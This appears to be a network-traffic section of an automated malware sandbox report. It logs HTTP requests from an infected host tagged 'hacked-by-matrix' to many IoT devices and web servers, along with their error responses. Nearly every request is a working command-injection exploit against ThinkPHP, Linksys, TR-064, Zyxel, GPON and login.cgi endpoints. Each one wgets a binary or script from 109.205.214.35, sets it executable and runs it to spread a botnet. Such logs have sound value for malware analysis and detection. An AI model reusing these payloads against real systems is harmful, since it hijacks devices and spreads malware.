                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1663192.168.2.135451688.219.45.180
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:31.509423018 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:31.676655054 CET110INHTTP/1.0 404
                                                        Content-Type: text/html
                                                        Data Raw: 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 2f 31 2e 30 20 34 30 34 20 d5 d2 b2 bb b5 bd b6 d4 cf f3 0a 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e
                                                        Data Ascii: <body><h1>HTTP/1.0 404 </h1></body>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1664192.168.2.1358664172.87.195.1248080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:31.665040016 CET110OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1665192.168.2.1358076172.65.46.11855555
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:31.732507944 CET438OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1666192.168.2.134354663.133.233.1987547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:32.583492041 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:32.682183981 CET104INHTTP/1.1 405 Method Not Allowed
                                                        Server:CPE-3.6.13
                                                        Content-Length: 0
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1667192.168.2.134355263.133.233.1987547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:32.682251930 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:32.783359051 CET104INHTTP/1.1 405 Method Not Allowed
                                                        Server:CPE-3.6.13
                                                        Content-Length: 0
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1668192.168.2.135841683.169.38.4580
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:32.925935030 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:33.869555950 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1669192.168.2.1356536212.8.251.980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.183410883 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:34.124458075 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:34.294878006 CET355INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.10.3 (Ubuntu)
                                                        Date: Thu, 21 Mar 2024 04:23:34 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 182
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1670192.168.2.1358174212.37.83.24380
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.193569899 CET228OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1671192.168.2.1337024136.159.73.16780
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.309156895 CET228OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:34.060239077 CET228OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:34.956491947 CET228OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:36.720216036 CET228OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:40.208219051 CET228OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:47.372206926 CET228OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1672192.168.2.1338568212.42.173.11380
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.328562021 CET228OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:33.490731955 CET521INHTTP/1.1 404 Not Found
                                                        Vary: Accept-Encoding
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Type: text/html
                                                        X-Content-Type-Options: nosniff
                                                        Date: Thu, 21 Mar 2024 04:13:36 GMT
                                                        Cache-Control: no-cache
                                                        Content-Length: 223
                                                        X-XSS-Protection: 1; mode=block
                                                        Connection: Keep-Alive
                                                        Accept-Ranges: bytes
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 72 65 3e 3c 2f 70 72 65 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE html><head> <title>Not Found</title> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"></head><body><h2>Access Error: 404 -- Not Found</h2><pre></pre></body></html>
                                                        Mar 21, 2024 05:23:33.963265896 CET521INHTTP/1.1 404 Not Found
                                                        Vary: Accept-Encoding
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Type: text/html
                                                        X-Content-Type-Options: nosniff
                                                        Date: Thu, 21 Mar 2024 04:13:36 GMT
                                                        Cache-Control: no-cache
                                                        Content-Length: 223
                                                        X-XSS-Protection: 1; mode=block
                                                        Connection: Keep-Alive
                                                        Accept-Ranges: bytes
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 72 65 3e 3c 2f 70 72 65 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE html><head> <title>Not Found</title> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"></head><body><h2>Access Error: 404 -- Not Found</h2><pre></pre></body></html>
                                                        Mar 21, 2024 05:23:34.923269987 CET521INHTTP/1.1 404 Not Found
                                                        Vary: Accept-Encoding
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Type: text/html
                                                        X-Content-Type-Options: nosniff
                                                        Date: Thu, 21 Mar 2024 04:13:36 GMT
                                                        Cache-Control: no-cache
                                                        Content-Length: 223
                                                        X-XSS-Protection: 1; mode=block
                                                        Connection: Keep-Alive
                                                        Accept-Ranges: bytes
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 72 65 3e 3c 2f 70 72 65 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE html><head> <title>Not Found</title> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"></head><body><h2>Access Error: 404 -- Not Found</h2><pre></pre></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1673192.168.2.1356674109.33.78.38080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.379683971 CET430OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 41 6d 61 6b 61 6e 6f 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+Amakano.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
                                                        Mar 21, 2024 05:23:36.623347044 CET430OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 41 6d 61 6b 61 6e 6f 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+Amakano.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
                                                        Mar 21, 2024 05:23:42.767381907 CET430OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 41 6d 61 6b 61 6e 6f 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+Amakano.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1674192.168.2.133562088.202.237.680
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.699671984 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:33.895191908 CET315INHTTP/1.1 400 Bad Request
                                                        Server: openresty
                                                        Date: Thu, 21 Mar 2024 04:23:33 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 154
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1675192.168.2.1358398172.67.176.08080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.795614004 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:34.316248894 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1676192.168.2.1357968109.54.108.239443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.815129995 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
